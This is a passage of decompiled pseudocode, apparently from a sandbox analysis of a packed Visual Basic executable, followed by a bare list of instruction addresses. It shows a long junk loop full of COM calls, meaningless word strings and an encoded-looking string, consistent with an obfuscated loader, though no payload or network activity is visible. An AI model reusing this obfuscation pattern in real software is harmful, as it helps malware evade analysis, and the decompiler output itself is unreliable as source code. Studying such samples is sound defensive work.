					_v168 = _t1665;
				}
				if( *0x417010 != 0) {
					_v768 = 0x417010;
				} else {
					_push(0x417010);
					_push(0x404410);
					L0040156E();
					_v768 = 0x417010;
				}
				_t1669 =  &_v208;
				L004014A8();
				_v412 = _t1669;
				_t1672 =  *((intOrPtr*)( *_v412 + 0x1d4))(_v412, _t1669,  *((intOrPtr*)( *((intOrPtr*)( *_v768)) + 0x2fc))( *_v768));
				asm("fclex");
				_v416 = _t1672;
				if(_v416 >= 0) {
					_v772 = _v772 & 0x00000000;
				} else {
					_push(0x1d4);
					_push(0x403cfc);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v772 = _t1672;
				}
				L00401562();
				_t1675 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4);
				asm("fclex");
				_v412 = _t1675;
				if(_v412 >= 0) {
					_v776 = _v776 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4033e4);
					_push(_a4);
					_push(_v412);
					L00401574();
					_v776 = _t1675;
				}
				_v460 = 0x1e08f6;
				_v456 = 0x64;
				_v36 = _v36 & 0x00000000;
				while(_v36 <= _v460) {
					if( *0x417010 != 0) {
						_v780 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v780 = 0x417010;
					}
					_t1713 =  &_v208;
					L004014A8();
					_v412 = _t1713;
					_t1717 =  *((intOrPtr*)( *_v412 + 0x120))(_v412,  &_v212, _t1713,  *((intOrPtr*)( *((intOrPtr*)( *_v780)) + 0x318))( *_v780));
					asm("fclex");
					_v416 = _t1717;
					if(_v416 >= 0) {
						_v784 = _v784 & 0x00000000;
					} else {
						_push(0x120);
						_push(0x403e24);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v784 = _t1717;
					}
					L0040144E();
					L00401556();
					_v356 = 0x6403;
					_t1719 =  &_v240;
					L00401442();
					_v376 = _t1719;
					_v800 =  *0x401210;
					 *((intOrPtr*)( *_a4 + 0x720))(_a4, L"TELEKABLERNE",  &_v376,  &_v356,  &_v200, 0x6cd24e,  &_v200, L"Jellifying", _t1719,  &_v240, _v212, 0, 0);
					L00401532();
					_push( &_v212);
					_push( &_v208);
					_push(2);
					L004014A2();
					L0040152C();
					_v280 = L"01/01/01";
					_v288 = 8;
					L0040151A();
					_push( &_v240);
					_push( &_v256);
					L0040141E();
					_v296 = 0x7d1;
					_v304 = 0x8002;
					_push( &_v256);
					_t1731 =  &_v304;
					_push(_t1731);
					L0040148A();
					_v412 = _t1731;
					_push( &_v256);
					_push( &_v240);
					_push(2);
					L00401514();
					_t2264 = _t2256 + 0x28;
					_t1734 = _v412;
					if(_t1734 != 0) {
						if( *0x417360 != 0) {
							_v788 = 0x417360;
						} else {
							_push(0x417360);
							_push(0x403c34);
							L0040156E();
							_v788 = 0x417360;
						}
						_t905 =  &_v788; // 0x417360
						_v412 =  *((intOrPtr*)( *_t905));
						_t1926 =  *((intOrPtr*)( *_v412 + 0x4c))(_v412,  &_v208);
						asm("fclex");
						_v416 = _t1926;
						if(_v416 >= 0) {
							_v792 = _v792 & 0x00000000;
						} else {
							_push(0x4c);
							_push(0x403c24);
							_push(_v412);
							_push(_v416);
							L00401574();
							_v792 = _t1926;
						}
						_v420 = _v208;
						_t1931 =  *((intOrPtr*)( *_v420 + 0x24))(_v420, L"Lserundersgelse9", L"karakterens",  &_v200);
						asm("fclex");
						_v424 = _t1931;
						if(_v424 >= 0) {
							_v796 = _v796 & 0x00000000;
						} else {
							_push(0x24);
							_push(0x403f10);
							_push(_v420);
							_push(_v424);
							L00401574();
							_v796 = _t1931;
						}
						_t1734 = _v200;
						_v492 = _t1734;
						_v200 = _v200 & 0x00000000;
						L00401544();
						L00401562();
					}
					_push(2);
					_push("ABC");
					_push(0x403f30);
					_push(0);
					L00401496();
					if(_t1734 != 3) {
						_t1734 =  *((intOrPtr*)( *_a4 + 0x710))(_a4);
						_v412 = _t1734;
						if(_v412 >= 0) {
							_v800 = _v800 & 0x00000000;
						} else {
							_push(0x710);
							_push(0x403414);
							_push(_a4);
							_push(_v412);
							L00401574();
							_v800 = _t1734;
						}
					}
					_push(" rr");
					L00401418();
					L00401544();
					_push(_t1734);
					_push(0x403f44);
					L0040154A();
					asm("sbb eax, eax");
					_v412 =  ~( ~( ~_t1734));
					L00401532();
					if(_v412 != 0) {
						_v280 = _a4;
						_v288 = 9;
						if( *0x417010 != 0) {
							_v804 = 0x417010;
						} else {
							_push(0x417010);
							_push(0x404410);
							L0040156E();
							_v804 = 0x417010;
						}
						_t960 =  &_v208; // 0x403f44
						_t1909 = _t960;
						L004014A8();
						_v412 = _t1909;
						_t1913 =  *((intOrPtr*)( *_v412 + 0x158))(_v412,  &_v200, _t1909,  *((intOrPtr*)( *((intOrPtr*)( *_v804)) + 0x30c))( *_v804));
						asm("fclex");
						_v416 = _t1913;
						if(_v416 >= 0) {
							_v808 = _v808 & 0x00000000;
						} else {
							_push(0x158);
							_push(0x403cdc);
							_push(_v412);
							_push(_v416);
							L00401574();
							_v808 = _t1913;
						}
						_v496 = _v200;
						_v200 = _v200 & 0x00000000;
						_v232 = _v496;
						_v240 = 8;
						_v328 = 0x5ffb77;
						_v336 = 3;
						_push(0x10);
						L00401310();
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_push(0x10);
						L00401310();
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_push(0x10);
						L00401310();
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_push(3);
						_push(L"AhqPMmu0oktAmE5cfXuhqt4svE63");
						_push(_v112);
						L0040145A();
						_t2264 = _t2264 + 0x3c;
						L00401562();
						L0040152C();
					}
					if( *0x417010 != 0) {
						_v812 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v812 = 0x417010;
					}
					_t993 =  &_v208; // 0x403f44
					_t1742 = _t993;
					L004014A8();
					_v412 = _t1742;
					_t1746 =  *((intOrPtr*)( *_v412 + 0x140))(_v412,  &_v356, _t1742,  *((intOrPtr*)( *((intOrPtr*)( *_v812)) + 0x310))( *_v812));
					asm("fclex");
					_v416 = _t1746;
					if(_v416 >= 0) {
						_v816 = _v816 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x403cdc);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v816 = _t1746;
					}
					if( *0x417010 != 0) {
						_v820 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v820 = 0x417010;
					}
					_t1750 =  &_v212;
					L004014A8();
					_v420 = _t1750;
					_t1754 =  *((intOrPtr*)( *_v420 + 0x48))(_v420,  &_v200, _t1750,  *((intOrPtr*)( *((intOrPtr*)( *_v820)) + 0x300))( *_v820));
					asm("fclex");
					_v424 = _t1754;
					if(_v424 >= 0) {
						_v824 = _v824 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403cfc);
						_push(_v420);
						_push(_v424);
						L00401574();
						_v824 = _t1754;
					}
					if( *0x417010 != 0) {
						_v828 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v828 = 0x417010;
					}
					_t1758 =  &_v216;
					L004014A8();
					_v428 = _t1758;
					_t1762 =  *((intOrPtr*)( *_v428 + 0x118))(_v428,  &_v360, _t1758,  *((intOrPtr*)( *((intOrPtr*)( *_v828)) + 0x318))( *_v828));
					asm("fclex");
					_v432 = _t1762;
					if(_v432 >= 0) {
						_v832 = _v832 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x403e24);
						_push(_v428);
						_push(_v432);
						L00401574();
						_v832 = _t1762;
					}
					if( *0x417010 != 0) {
						_v836 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v836 = 0x417010;
					}
					_t1766 =  &_v220;
					L004014A8();
					_v436 = _t1766;
					_t1770 =  *((intOrPtr*)( *_v436 + 0x80))(_v436,  &_v376, _t1766,  *((intOrPtr*)( *((intOrPtr*)( *_v836)) + 0x2fc))( *_v836));
					asm("fclex");
					_v440 = _t1770;
					if(_v440 >= 0) {
						_v840 = _v840 & 0x00000000;
					} else {
						_push(0x80);
						_push(0x403cfc);
						_push(_v436);
						_push(_v440);
						L00401574();
						_v840 = _t1770;
					}
					_t2407 = _v376;
					_v384 = _t2407;
					_v368 = _v360;
					_v380 = 0x3fb620;
					_v364 = _v356;
					 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v364,  &_v380, _v200,  &_v368,  &_v384, 0x3e3d,  &_v372);
					_v52 = _v372;
					L00401532();
					_push( &_v220);
					_push( &_v216);
					_push( &_v212);
					_t1082 =  &_v208; // 0x403f44
					_push(4);
					L004014A2();
					_v232 = 0x80020004;
					_v240 = 0xa;
					_push(0);
					_push(0xffffffff);
					_push( &_v240);
					_push(0x403fb0);
					_push( &_v256);
					L00401406();
					_t1788 =  &_v256;
					_push(_t1788);
					_push(0x2008);
					L0040140C();
					_v376 = _t1788;
					_push( &_v376);
					_push( &_v164);
					L00401412();
					_push( &_v256);
					_push( &_v240);
					_push(2);
					L00401514();
					_t2266 = _t2264 + 0x20;
					_t1795 =  *((intOrPtr*)(_v164 + 0xc));
					_push( *((intOrPtr*)(_t1795 + (0 -  *((intOrPtr*)(_v164 + 0x14))) * 4)));
					_push(0x403d7c);
					L0040154A();
					if(_t1795 != 0) {
						_t1897 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v208);
						asm("fclex");
						_v412 = _t1897;
						if(_v412 >= 0) {
							_v844 = _v844 & 0x00000000;
						} else {
							_push(0x160);
							_push(0x4033e4);
							_push(_a4);
							_push(_v412);
							L00401574();
							_v844 = _t1897;
						}
						if( *0x417360 != 0) {
							_v848 = 0x417360;
						} else {
							_push(0x417360);
							_push(0x403c34);
							L0040156E();
							_v848 = 0x417360;
						}
						_t1112 =  &_v848; // 0x417360
						_v416 =  *((intOrPtr*)( *_t1112));
						_v500 = _v208;
						_v208 = _v208 & 0x00000000;
						_t1901 =  &_v212;
						L004014A8();
						_t1904 =  *((intOrPtr*)( *_v416 + 0x40))(_v416, _t1901, _t1901, _v500, L"Menuvalgs1");
						asm("fclex");
						_v420 = _t1904;
						if(_v420 >= 0) {
							_v852 = _v852 & 0x00000000;
						} else {
							_push(0x40);
							_push(0x403c24);
							_push(_v416);
							_push(_v420);
							L00401574();
							_v852 = _t1904;
						}
						L00401562();
					}
					if( *0x417010 != 0) {
						_v856 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v856 = 0x417010;
					}
					_t1799 =  &_v208;
					L004014A8();
					_v412 = _t1799;
					_t1802 =  *((intOrPtr*)( *_v412 + 0x1c0))(_v412, _t1799,  *((intOrPtr*)( *((intOrPtr*)( *_v856)) + 0x2fc))( *_v856));
					asm("fclex");
					_v416 = _t1802;
					if(_v416 >= 0) {
						_v860 = _v860 & 0x00000000;
					} else {
						_push(0x1c0);
						_push(0x403cfc);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v860 = _t1802;
					}
					L00401562();
					L00401556();
					_push(1);
					_push(_v32);
					L00401400();
					L00401544();
					_push(_t1802);
					_push(0x403fe4);
					L0040154A();
					asm("sbb eax, eax");
					_v412 =  ~( ~( ~_t1802));
					L00401532();
					if(_v412 != 0) {
						if( *0x417010 != 0) {
							_v864 = 0x417010;
						} else {
							_push(0x417010);
							_push(0x404410);
							L0040156E();
							_v864 = 0x417010;
						}
						_t2172 =  *((intOrPtr*)( *_v864));
						_t1883 =  &_v208;
						L004014A8();
						_v412 = _t1883;
						_t1887 =  *((intOrPtr*)( *_v412 + 0xf8))(_v412,  &_v212, _t1883,  *((intOrPtr*)(_t2172 + 0x308))( *_v864));
						asm("fclex");
						_v416 = _t1887;
						if(_v416 >= 0) {
							_v868 = _v868 & 0x00000000;
						} else {
							_push(0xf8);
							_push(0x403cdc);
							_push(_v412);
							_push(_v416);
							L00401574();
							_v868 = _t1887;
						}
						_t1888 =  &_v240;
						L0040144E();
						_t2271 = _t2266 + 0x10;
						L00401442();
						_v872 = _t1888;
						asm("fild dword [ebp-0x364]");
						_v880 = _t2407;
						_v884 = _v880 *  *0x401208;
						 *_t2271 = _v884;
						_t1891 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t2172, _t1888, _t1888, _v212, 0, 0);
						asm("fclex");
						_v420 = _t1891;
						if(_v420 >= 0) {
							_v888 = _v888 & 0x00000000;
						} else {
							_push(0x84);
							_push(0x4033e4);
							_push(_a4);
							_push(_v420);
							L00401574();
							_v888 = _t1891;
						}
						_push( &_v212);
						_push( &_v208);
						_push(2);
						L004014A2();
						_t2266 = _t2271 + 0xc;
						L0040152C();
					}
					if( *0x417010 != 0) {
						_v892 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v892 = 0x417010;
					}
					_t1810 =  &_v208;
					L004014A8();
					_v412 = _t1810;
					_t1814 =  *((intOrPtr*)( *_v412 + 0x130))(_v412,  &_v212, _t1810,  *((intOrPtr*)( *((intOrPtr*)( *_v892)) + 0x314))( *_v892));
					asm("fclex");
					_v416 = _t1814;
					if(_v416 >= 0) {
						_v896 = _v896 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x403cdc);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v896 = _t1814;
					}
					_push(0);
					_push(0);
					_push(_v212);
					_push( &_v240); // executed
					L0040144E(); // executed
					_t2267 = _t2266 + 0x10;
					if( *0x417010 != 0) {
						_v900 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v900 = 0x417010;
					}
					_t1819 =  &_v216;
					L004014A8();
					_v420 = _t1819;
					_t1823 =  *((intOrPtr*)( *_v420 + 0x48))(_v420,  &_v200, _t1819,  *((intOrPtr*)( *((intOrPtr*)( *_v900)) + 0x308))( *_v900));
					asm("fclex");
					_v424 = _t1823;
					if(_v424 >= 0) {
						_v904 = _v904 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x403cdc);
						_push(_v420);
						_push(_v424);
						L00401574();
						_v904 = _t1823;
					}
					L004014DE();
					_t2156 =  &_v204;
					L00401544();
					 *_t2267 =  *0x401200;
					_t2409 =  *0x4011f8;
					 *_t2267 = _t2409;
					 *((intOrPtr*)( *_a4 + 0x728))(_a4, _t2156, _t2156, 0x5c2322,  &_v204, _v200, _t2156,  &_v408,  &_v240);
					_v108 = _v408;
					_v104 = _v404;
					_push( &_v200);
					_push( &_v204);
					_push(2);
					L00401550();
					_push( &_v212);
					_push( &_v216);
					_push( &_v208);
					_push(3);
					L004014A2();
					L0040152C();
					_v280 = L"9-9-9";
					_v288 = 8;
					_t2158 =  &_v240;
					L0040151A();
					_push( &_v240);
					_push( &_v256);
					L00401484();
					_v296 = 9;
					_v304 = 0x8002;
					_push( &_v256);
					_t1840 =  &_v304;
					_push(_t1840);
					L0040148A();
					_v412 = _t1840;
					_push( &_v256);
					_push( &_v240);
					_push(2);
					L00401514();
					_t2270 = _t2267 + 0x28;
					if(_v412 != 0) {
						if( *0x417010 != 0) {
							_v908 = 0x417010;
						} else {
							_push(0x417010);
							_push(0x404410);
							L0040156E();
							_v908 = 0x417010;
						}
						_t1872 =  &_v208;
						L004014A8();
						_v412 = _t1872;
						_t1876 =  *((intOrPtr*)( *_v412 + 0x50))(_v412,  &_v200, _t1872,  *((intOrPtr*)( *((intOrPtr*)( *_v908)) + 0x2fc))( *_v908));
						asm("fclex");
						_v416 = _t1876;
						if(_v416 >= 0) {
							_v912 = _v912 & 0x00000000;
						} else {
							_push(0x50);
							_push(0x403cfc);
							_push(_v412);
							_push(_v416);
							L00401574();
							_v912 = _t1876;
						}
						_v504 = _v200;
						_t1283 =  &_v200;
						 *_t1283 = _v200 & 0x00000000;
						_t2389 =  *_t1283;
						_v232 = _v504;
						_v240 = 8;
						_push(2);
						_push( &_v240);
						L00401526();
						_v180 = _t2409;
						L00401562();
						_t2158 =  &_v240;
						L0040152C();
					}
					 *_v140 =  *0x401260;
					 *((long long*)(_v140 + 8)) =  *0x401258;
					_v376 =  &_v152;
					_t2412 =  *0x401250;
					_push(_t2158);
					_push(_t2158);
					 *_t2270 = _t2412;
					asm("fld1");
					_push(_t2158);
					_push(_t2158);
					 *_t2270 = _t2412;
					_push( &_v376);
					L00401478();
					L0040147E();
					asm("fcomp qword [0x401248]");
					asm("fnstsw ax");
					asm("sahf");
					if(_t2389 != 0) {
						if( *0x417360 != 0) {
							_v916 = 0x417360;
						} else {
							_push(0x417360);
							_push(0x403c34);
							L0040156E();
							_v916 = 0x417360;
						}
						_t1300 =  &_v916; // 0x417360
						_t1864 =  *((intOrPtr*)( *_t1300));
						_v412 = _t1864;
						L00401472();
						_t1865 =  &_v208;
						L004014A8();
						_t1868 =  *((intOrPtr*)( *_v412 + 0x40))(_v412, _t1865, _t1865, _t1864, _v160, 0x403d68, L"Coracoidal4");
						asm("fclex");
						_v416 = _t1868;
						if(_v416 >= 0) {
							_v920 = _v920 & 0x00000000;
						} else {
							_push(0x40);
							_push(0x403c24);
							_push(_v412);
							_push(_v416);
							L00401574();
							_v920 = _t1868;
						}
						L00401562();
					}
					if( *0x417010 != 0) {
						_v924 = 0x417010;
					} else {
						_push(0x417010);
						_push(0x404410);
						L0040156E();
						_v924 = 0x417010;
					}
					_t1851 =  &_v208;
					L004014A8();
					_v412 = _t1851;
					_v280 = 0x80020004;
					_v288 = 0xa;
					L00401310();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t1855 =  *((intOrPtr*)( *_v412 + 0x1b0))(_v412, 0x10, _t1851,  *((intOrPtr*)( *((intOrPtr*)( *_v924)) + 0x314))( *_v924));
					asm("fclex");
					_v416 = _t1855;
					if(_v416 >= 0) {
						_v928 = _v928 & 0x00000000;
					} else {
						_push(0x1b0);
						_push(0x403cdc);
						_push(_v412);
						_push(_v416);
						L00401574();
						_v928 = _t1855;
					}
					L00401562();
					_t1859 =  *((intOrPtr*)( *_a4 + 0x288))(_a4,  &_v208);
					asm("fclex");
					_v412 = _t1859;
					if(_v412 >= 0) {
						_v932 = _v932 & 0x00000000;
					} else {
						_push(0x288);
						_push(0x4033e4);
						_push(_a4);
						_push(_v412);
						L00401574();
						_v932 = _t1859;
					}
					_push(0);
					_push(0);
					_push(_v208);
					_t1860 =  &_v240;
					_push(_t1860);
					L0040144E();
					_t2256 = _t2270 + 0x10;
					_push(_t1860);
					L00401442();
					_v44 = _t1860;
					L00401562();
					L0040152C();
					_v36 = _v36 + _v456;
				}
				if( *0x417360 != 0) {
					_v936 = 0x417360;
				} else {
					_push(0x417360);
					_push(0x403c34);
					L0040156E();
					_v936 = 0x417360;
				}
				_t1354 =  &_v936; // 0x417360
				_v412 =  *((intOrPtr*)( *_t1354));
				_t1682 =  *((intOrPtr*)( *_v412 + 0x14))(_v412,  &_v208);
				asm("fclex");
				_v416 = _t1682;
				if(_v416 >= 0) {
					_v940 = _v940 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x403c24);
					_push(_v412);
					_push(_v416);
					L00401574();
					_v940 = _t1682;
				}
				_v420 = _v208;
				_t1687 =  *((intOrPtr*)( *_v420 + 0x58))(_v420,  &_v200);
				asm("fclex");
				_v424 = _t1687;
				if(_v424 >= 0) {
					_v944 = _v944 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x403e50);
					_push(_v420);
					_push(_v424);
					L00401574();
					_v944 = _t1687;
				}
				_t1691 =  &_v212;
				L004014A8();
				_v428 = _t1691;
				_t1695 =  *((intOrPtr*)( *_v428 + 0xe0))(_v428,  &_v356, _t1691,  *((intOrPtr*)( *_a4 + 0x2fc))(_a4));
				asm("fclex");
				_v432 = _t1695;
				if(_v432 >= 0) {
					_v948 = _v948 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x403cfc);
					_push(_v428);
					_push(_v432);
					L00401574();
					_v948 = _t1695;
				}
				L004013F4();
				L00401544();
				L004013FA(); // executed
				L00401550();
				_t1699 =  &_v208;
				L004014A2();
				_v44 = 0x8a41aaa8;
				E0040F1EB();
				0xeb419255(_v828, _t1699, 2, _t1699,  &_v212, 2,  &_v200,  &_v204, _v200, L"Options", L"Show Tips at Startup", _t1695, _v356);
				_push([gs:ebp-0xc8]);
				_push( &_v200);
				_push(2);
				L00401550();
				_push( &_v224);
				_push( &_v220);
				_push( &_v216);
				_push( &_v212);
				_push( &_v208);
				_push(5);
				L004014A2();
				_push( &_v272);
				_push( &_v256);
				_t1709 =  &_v240;
				_push(_t1709);
				_push(3);
				L00401514();
				return _t1709;
			}

0x00411cf2
0x00411d01
0x00411d0d
0x00411d15
0x00411d18
0x00411d25
0x00411d2e
0x00411d31
0x00411d40
0x00411d43
0x00411d45
0x00411d4d
0x00411d4e
0x00411d53
0x00411d55
0x00411d60
0x00411d61
0x00411d66
0x00411d6b
0x00411d71
0x00411d72
0x00411d77
0x00411d78
0x00411d88
0x00411d95
0x00411da3
0x00411db0
0x00411dcd
0x00411db2
0x00411db2
0x00411db7
0x00411dbc
0x00411dc1
0x00411dc1
0x00411dd7
0x00411ddf
0x00411dfa
0x00411dfd
0x00411dff
0x00411e0c
0x00411e2e
0x00411e0e
0x00411e0e
0x00411e10
0x00411e15
0x00411e1b
0x00411e21
0x00411e26
0x00411e26
0x00411e3b
0x00411e41
0x00411e4b
0x00411e5c
0x00411e79
0x00411e5e
0x00411e5e
0x00411e63
0x00411e68
0x00411e6d
0x00411e6d
0x00411e9d
0x00411ea4
0x00411ea9
0x00411ec4
0x00411ec7
0x00411ec9
0x00411ed6
0x00411ef8
0x00411ed8
0x00411ed8
0x00411eda
0x00411edf
0x00411ee5
0x00411eeb
0x00411ef0
0x00411ef0
0x00411f02
0x00411f0f
0x00411f10
0x00411f11
0x00411f12
0x00411f27
0x00411f2a
0x00411f2c
0x00411f39
0x00411f5b
0x00411f3b
0x00411f3b
0x00411f3d
0x00411f42
0x00411f48
0x00411f4e
0x00411f53
0x00411f53
0x00411f68
0x00411f73
0x00411f7a
0x00411f7b
0x00411f7d
0x00411f82
0x00411f82
0x00411f8c
0x00411fa9
0x00411f8e
0x00411f8e
0x00411f93
0x00411f98
0x00411f9d
0x00411f9d
0x00411fcd
0x00411fd4
0x00411fd9
0x00411fdf
0x00411fe9
0x00411ff6
0x00412003
0x00412004
0x00412005
0x00412006
0x00412015
0x0041201b
0x0041201d
0x0041202a
0x0041204f
0x0041202c
0x0041202c
0x00412031
0x00412036
0x0041203c
0x00412042
0x00412047
0x00412047
0x0041205c
0x00412061
0x00412063
0x0041206f
0x0041208c
0x00412071
0x00412071
0x00412076
0x0041207b
0x00412080
0x00412080
0x004120b0
0x004120b7
0x004120bc
0x004120d7
0x004120dd
0x004120df
0x004120ec
0x00412111
0x004120ee
0x004120ee
0x004120f3
0x004120f8
0x004120fe
0x00412104
0x00412109
0x00412109
0x0041211f
0x0041213c
0x00412121
0x00412121
0x00412126
0x0041212b
0x00412130
0x00412130
0x00412160
0x00412167
0x0041216c
0x00412187
0x0041218a
0x0041218c
0x00412199
0x004121bb
0x0041219b
0x0041219b
0x0041219d
0x004121a2
0x004121a8
0x004121ae
0x004121b3
0x004121b3
0x004121c9
0x004121e6
0x004121cb
0x004121cb
0x004121d0
0x004121d5
0x004121da
0x004121da
0x0041220a
0x00412211
0x00412216
0x00412231
0x00412237
0x00412239
0x00412246
0x0041226b
0x00412248
0x00412248
0x0041224d
0x00412252
0x00412258
0x0041225e
0x00412263
0x00412263
0x00412279
0x00412296
0x0041227b
0x0041227b
0x00412280
0x00412285
0x0041228a
0x0041228a
0x004122ba
0x004122c1
0x004122c6
0x004122e1
0x004122e4
0x004122e6
0x004122f3
0x00412315
0x004122f5
0x004122f5
0x004122f7
0x004122fc
0x00412302
0x00412308
0x0041230d
0x0041230d
0x00412323
0x00412340
0x00412325
0x00412325
0x0041232a
0x0041232f
0x00412334
0x00412334
0x00412364
0x0041236b
0x00412370
0x0041238b
0x00412391
0x00412393
0x004123a0
0x004123c5
0x004123a2
0x004123a2
0x004123a7
0x004123ac
0x004123b2
0x004123b8
0x004123bd
0x004123bd
0x004123d2
0x004123d8
0x004123e7
0x004123ed
0x004123f3
0x004123f9
0x00412456
0x0041245c
0x00412469
0x0041248b
0x0041246b
0x0041246b
0x00412470
0x00412475
0x00412478
0x0041247e
0x00412483
0x00412483
0x00412498
0x004124a4
0x004124ab
0x004124ac
0x004124ae
0x004124bc
0x004124c3
0x004124ca
0x004124d1
0x004124d8
0x004124d9
0x004124db
0x004124e0
0x004124e3
0x004124ed
0x004124f7
0x004124fd
0x004124fe
0x0041250b
0x00412510
0x00412511
0x00412516
0x0041251d
0x00412523
0x00412530
0x0041253b
0x00412549
0x00412556
0x00412573
0x00412558
0x00412558
0x0041255d
0x00412562
0x00412567
0x00412567
0x00412597
0x0041259e
0x004125a3
0x004125be
0x004125c1
0x004125c3
0x004125d0
0x004125f2
0x004125d2
0x004125d2
0x004125d4
0x004125d9
0x004125df
0x004125e5
0x004125ea
0x004125ea
0x00412600
0x0041261d
0x00412602
0x00412602
0x00412607
0x0041260c
0x00412611
0x00412611
0x00412641
0x00412648
0x0041264d
0x00412668
0x0041266b
0x0041266d
0x0041267a
0x0041269c
0x0041267c
0x0041267c
0x0041267e
0x00412683
0x00412689
0x0041268f
0x00412694
0x00412694
0x004126aa
0x004126c7
0x004126ac
0x004126ac
0x004126b1
0x004126b6
0x004126bb
0x004126bb
0x004126eb
0x004126f2
0x004126f7
0x00412712
0x00412718
0x0041271a
0x00412727
0x0041274c
0x00412729
0x00412729
0x0041272e
0x00412733
0x00412739
0x0041273f
0x00412744
0x00412744
0x00412759
0x0041275b
0x0041275c
0x00412762
0x00412768
0x0041276a
0x0041276f
0x0041277b
0x00412782
0x00412783
0x00412785
0x00412793
0x0041279a
0x004127a1
0x004127a2
0x004127a4
0x004127a9
0x004127a9
0x004127ac
0x004127b1
0x004127be
0x004127db
0x004127c0
0x004127c0
0x004127c5
0x004127ca
0x004127cf
0x004127cf
0x004127ff
0x00412806
0x0041280b
0x0041281f
0x00412825
0x00412827
0x00412834
0x00412859
0x00412836
0x00412836
0x0041283b
0x00412840
0x00412846
0x0041284c
0x00412851
0x00412851
0x00412866
0x00412872
0x0041288f
0x00412874
0x00412874
0x00412879
0x0041287e
0x00412883
0x00412883
0x004128b3
0x004128ba
0x004128bf
0x004128da
0x004128dd
0x004128df
0x004128ec
0x0041290e
0x004128ee
0x004128ee
0x004128f0
0x004128f5
0x004128fb
0x00412901
0x00412906
0x00412906
0x0041291b
0x00412921
0x00412934
0x00412954
0x0041295a
0x00412967
0x00412989
0x00412969
0x00412969
0x0041296e
0x00412973
0x00412976
0x0041297c
0x00412981
0x00412981
0x00412997
0x004129a1
0x004129ac
0x004129b1
0x004129bb
0x004129cb
0x004129d1
0x004129dc
0x004129e3
0x004129e4
0x004129e9
0x004129f3
0x00412a03
0x00412a04
0x00412a0a
0x00412a0b
0x00412a10
0x00412a1d
0x00412a24
0x00412a25
0x00412a27
0x00412a2c
0x00412a36
0x00412a38
0x00412a3a
0x00412a44
0x00412a5a
0x00412a5f
0x00412a67
0x00412a68
0x00412a6d
0x00412a70
0x00412a76
0x00412a76
0x00412a84
0x00412a8f
0x00412a95
0x00412a9b
0x00412aa1
0x00412aa2
0x00412aa3
0x00412aa6
0x00412aa8
0x00412aa9
0x00412aaa
0x00412ab3
0x00412ab4
0x00412ab9
0x00412abe
0x00412ac4
0x00412ac6
0x00412ac7
0x00412ad4
0x00412af1
0x00412ad6
0x00412ad6
0x00412adb
0x00412ae0
0x00412ae5
0x00412ae5
0x00412afb
0x00412b01
0x00412b03
0x00412b16
0x00412b1c
0x00412b23
0x00412b37
0x00412b3a
0x00412b3c
0x00412b49
0x00412b6b
0x00412b4b
0x00412b4b
0x00412b4d
0x00412b52
0x00412b58
0x00412b5e
0x00412b63
0x00412b63
0x00412b78
0x00412b78
0x00412b7d
0x00412b87
0x00412b9d
0x00412ba2
0x00412ba4
0x00412bac
0x00412bb3
0x00412bb4
0x00412bb9
0x00412bc3
0x00412bd3
0x00412bd4
0x00412bda
0x00412bdb
0x00412be0
0x00412bed
0x00412bf4
0x00412bf5
0x00412bf7
0x00412bfc
0x00412c08
0x00412c15
0x00412c32
0x00412c17
0x00412c17
0x00412c1c
0x00412c21
0x00412c26
0x00412c26
0x00412c3c
0x00412c44
0x00412c4d
0x00412c54
0x00412c68
0x00412c6b
0x00412c6d
0x00412c7a
0x00412c9c
0x00412c7c
0x00412c7c
0x00412c7e
0x00412c83
0x00412c89
0x00412c8f
0x00412c94
0x00412c94
0x00412ca9
0x00412ca9
0x00412cb5
0x00412cd2
0x00412cb7
0x00412cb7
0x00412cbc
0x00412cc1
0x00412cc6
0x00412cc6
0x00412cf6
0x00412cfd
0x00412d02
0x00412d1d
0x00412d23
0x00412d25
0x00412d32
0x00412d57
0x00412d34
0x00412d34
0x00412d39
0x00412d3e
0x00412d44
0x00412d4a
0x00412d4f
0x00412d4f
0x00412d65
0x00412d82
0x00412d67
0x00412d67
0x00412d6c
0x00412d71
0x00412d76
0x00412d76
0x00412d9c
0x00412da6
0x00412dad
0x00412db2
0x00412dcd
0x00412dd0
0x00412dd2
0x00412ddf
0x00412e01
0x00412de1
0x00412de1
0x00412de3
0x00412de8
0x00412dee
0x00412df4
0x00412df9
0x00412df9
0x00412e08
0x00412e18
0x00412e26
0x00412e2e
0x00412e4b
0x00412e57
0x00412e5e
0x00412e5f
0x00412e61
0x00412e66
0x00412e69
0x00412e73
0x00412e89
0x00412e8e
0x00412e94
0x00412e95
0x00412ea5
0x00412eb2
0x00412ec0
0x00412ecd
0x00412eea
0x00412ecf
0x00412ecf
0x00412ed4
0x00412ed9
0x00412ede
0x00412ede
